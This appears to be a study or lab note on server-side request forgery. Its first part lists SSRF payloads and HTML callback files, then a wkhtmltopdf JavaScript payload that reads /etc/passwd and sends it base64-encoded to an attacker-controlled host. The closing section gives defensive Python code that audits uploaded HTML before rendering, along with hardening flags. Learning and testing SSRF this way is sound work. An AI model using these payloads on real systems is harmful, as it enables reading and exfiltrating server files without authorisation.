# Server Side Request Forgery (SSRF)

## Basic SSRF payloads

```
file:///etc/passwd
http://127.0.0.1
http://127.0.0.1:5000
http://127.0.0.1:1
index.html
index.php
http::////127.0.0.1:1
```

## Blind SSRF

### HTML File Upload To SSRF

Create an HTML file with the following code:

```html
<!DOCTYPE html>
<html>
<body>
	<a>Hello World!</a>
	<img src="http://<SERVICE IP>:PORT/x?=viaimgtag">
</body>
</html>
```

Upload this file and check whether you get a hit on your netcat listener.

I got a hit on my netcat listener.

### Using Burp Collaborator

Use the code below in the HTML file:

```html
<!DOCTYPE html>
<html>
<body>
	<a>Hello World!</a>
	<img src="http://oldac4hch7f4k2reoc7cyj3y7pdg17pw.oastify.com/x?=viaimgtag">
</body>
</html>
```

## wkhtmltopdf Blind SSRF Exploit

By inspecting the request, we notice `wkhtmltopdf` in the User-Agent. If we browse [wkhtmltopdf's downloads webpage](https://wkhtmltopdf.org/downloads.html), the below statement catches our attention:

> Do not use wkhtmltopdf with any untrusted HTML – be sure to sanitize any user-supplied HTML/JS; otherwise, it can lead to the complete takeover of the server it is running on! Please read the project status for the gory details.

We can execute JavaScript in wkhtmltopdf! Let us leverage this functionality to read a local file by creating the following HTML document.

```html
<html>
    <body>
        <b>Exfiltration via Blind SSRF</b>
        <script>
        var readfile = new XMLHttpRequest(); // Read the local file
        var exfil = new XMLHttpRequest(); // Send the file to our server
        readfile.open("GET","file:///etc/passwd", true); 
        readfile.send();
        readfile.onload = function() {
            if (readfile.readyState === 4) {
                var url = 'http://<SERVICE IP>:<PORT>/?data='+btoa(this.response);
                exfil.open("GET", url, true);
                exfil.send();
            }
        }
        readfile.onerror = function(){document.write('<a>Oops!</a>');}
        </script>
     </body>
</html>
```

In this case, we are using two [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) objects, one for reading the local file and another one to send it to our server. Also, we are using the `btoa` function to send the data encoded in Base64.
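On the defensive side, the upload and wkhtmltopdf cases above both come down to a server-side renderer fetching whatever the submitted HTML references. The following is an added example, not code from the original notes or from the wkhtmltopdf project: a pre-render audit that rejects script elements, event handlers, and any URL that is not plain http(s) to an allowlisted host. The names `check_url`, `audit_html`, `RenderAudit` and the host `cdn.example` are assumptions made for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a renderer fetch a resource (illustrative, not exhaustive).
URL_ATTRS = {"src", "href", "data", "action", "poster", "background"}

def check_url(url, allowed_hosts):
    """Return None if the renderer may fetch url, else a short reason string."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return "unparseable"
    if parts.scheme not in ("http", "https"):
        # file:// and friends are refused; relative paths resolve against the
        # renderer's base URL, which may itself be file://.
        return "scheme-not-allowed" if parts.scheme else "relative-url"
    host = parts.hostname
    if not host:
        return "no-host"  # e.g. a malformed "http::////..." value
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_private or ip.is_link_local:
            return "internal-address"  # refused even if someone allowlists it
    except ValueError:
        pass  # not an IP literal; fall through to the hostname allowlist
    return None if host in allowed_hosts else "host-not-allowed"

class RenderAudit(HTMLParser):
    """Collects (tag, reason, value) for everything a renderer must not act on."""
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append((tag, "script-element", ""))
        for name, value in attrs:
            if name.startswith("on"):  # inline handlers such as onerror/onload
                self.findings.append((tag, "event-handler", name))
            elif name in URL_ATTRS and value:
                reason = check_url(value, self.allowed_hosts)
                if reason:
                    self.findings.append((tag, reason, value))

def audit_html(html, allowed_hosts=frozenset()):
    """Audit an uploaded document; an empty list means nothing was flagged."""
    parser = RenderAudit(allowed_hosts)
    parser.feed(html)
    return parser.findings
```

This is a pre-render gate, not a substitute for hardening the renderer: run wkhtmltopdf with `--disable-javascript` and `--disable-local-file-access`, and restrict its network egress. The hostname check does no DNS resolution, so an allowlisted name that resolves or redirects to an internal address is only stopped at the network layer.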
